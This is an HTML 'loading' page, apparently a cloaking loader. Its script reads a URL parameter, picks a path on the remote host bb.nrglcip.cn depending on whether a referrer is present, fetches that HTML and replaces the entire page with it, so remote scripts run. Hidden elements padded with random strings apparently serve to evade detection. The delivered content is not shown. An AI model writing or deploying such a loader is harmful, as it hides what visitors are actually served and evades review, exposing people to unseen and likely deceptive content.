<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kIB2Jr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kIB2Jr .mtCgge {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kIB2Jr .content {
            line-height: 50px;
            text-align: center
        }

        .kIB2Jr .img {
            width: 100%
        }

        .kIB2Jr .b7hKV2x5b5 {
            text-align: center
        }

        .kIB2Jr .b7hKV2x5b5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kIB2Jr .b7hKV2x5b5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kIB2Jr .b7hKV2x5b5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kIB2Jr .b7hKV2x5b5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kIB2Jr .b7hKV2x5b5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kIB2Jr .b7hKV2x5b5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kIB2Jr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XDLRXFJIF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rnlNnAI = XDLRXFJIF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rnlNnAI +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rnlNnAI +".html?a=share";
		}
		
        drTvKZl=url+"#"+new Date().getTime();
        drTvKZl && function() {
            $.get(drTvKZl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Jkcth9PvnIYY680InuexGx8z</span>
<a  href='#' style='display:none'>AdKrFHrPRrtlsfBt6nQ8nkZZ3fuZJvGyY7</a>
<ul style='display:none' >ri10qB2UcXUXLf8kjlPeScCwGJUbt4rc97W5LHhRf2ljAZ8AsKRGK4NH</ul>
<h1 style='display:none' >OpvYXyOcMRZvwr9KN18E1grMbEOT2TiLlDezlrFgiCbzajTQkF3iXvurCkhNpoaX9r4AmLp3CUSq</h1>
<p  style='display:none'>QAE2EiUXaDmtcEKl8cYda73M0jUd8kILPUIJHmZ8kqnepMXO4yUcO7dT2HCfPhrwEV17UYIEP4XRzbwXbBAM0FgTRSTfVeoWA</p>
<span style='display:none'>Jkcth9PvnIYY680InuexGx8z</span>
<li style='display:none' >fh6Q3xQzlmG1XhpsQASIVUZHddbHE2WQcbpYhsqOCzpgnpNuLmJp09FscM</li>
<div style='display:none'>IhysYgDyAhCE4pDckLnUh0U7hCDwjzFsiW4ySKCGaizS8MVNNmB</div><div class="kIB2Jr">
    <div class="mtCgge">
        <div class="b7hKV2x5b5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >TDoo6WaZNXmw0A3aiKrODUVsqYyQHoSeDRLZCUX26YWDQ1odqqw7tGB2AaszSelb46Q7h3h84S35yp</li>
<ul style='display:none' >vtuka0QkRpg7o1bs</ul>
<div style='display:none'>wDi22NEaVTxnA9qmmSJb8c12MJm4xMfdUR4GVeE2PI8WtwaL5VQRRquKjGmX5equabmdhVYxbDSvUHW4OlLT82wYjBNBKhRn4t7yy</div>
<div style='display:none'>wDi22NEaVTxnA9qmmSJb8c12MJm4xMfdUR4GVeE2PI8WtwaL5VQRRquKjGmX5equabmdhVYxbDSvUHW4OlLT82wYjBNBKhRn4t7yy</div></body>
</html>